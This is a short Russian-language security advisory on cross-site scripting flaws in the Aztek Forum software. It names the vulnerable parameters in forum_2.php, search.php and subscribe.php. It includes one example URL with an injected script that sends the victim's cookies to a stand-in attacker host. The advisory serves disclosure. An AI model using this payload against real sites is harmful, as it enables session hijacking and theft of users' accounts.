Программа: Aztek Forum
Удаленный атакующий может получить важные данные пользователей.
Уязвимость существует в нескольких сценариях при обработке входных данных. Удаленный атакующий может создать специально сформированный URL и выполнить произвольный HTML код в браузере жертвы.
Пример:
http://[target]/forum%20aztek/forum_2.php?msg=10 & return=')%3C/script%3E%3Cscript%3E%20%20
document.location=%20'www.site.com/code_evil.php? cookie='%20+window.document.cookie;%20%20%3C/script%3E
Уязвимость существует при обработке переменных 'return' и 'title' сценария 'forum_2.php', при обработке поисковых запросов в файле 'search.php', а также в переменной 'email' файла
'subscribe.php'.
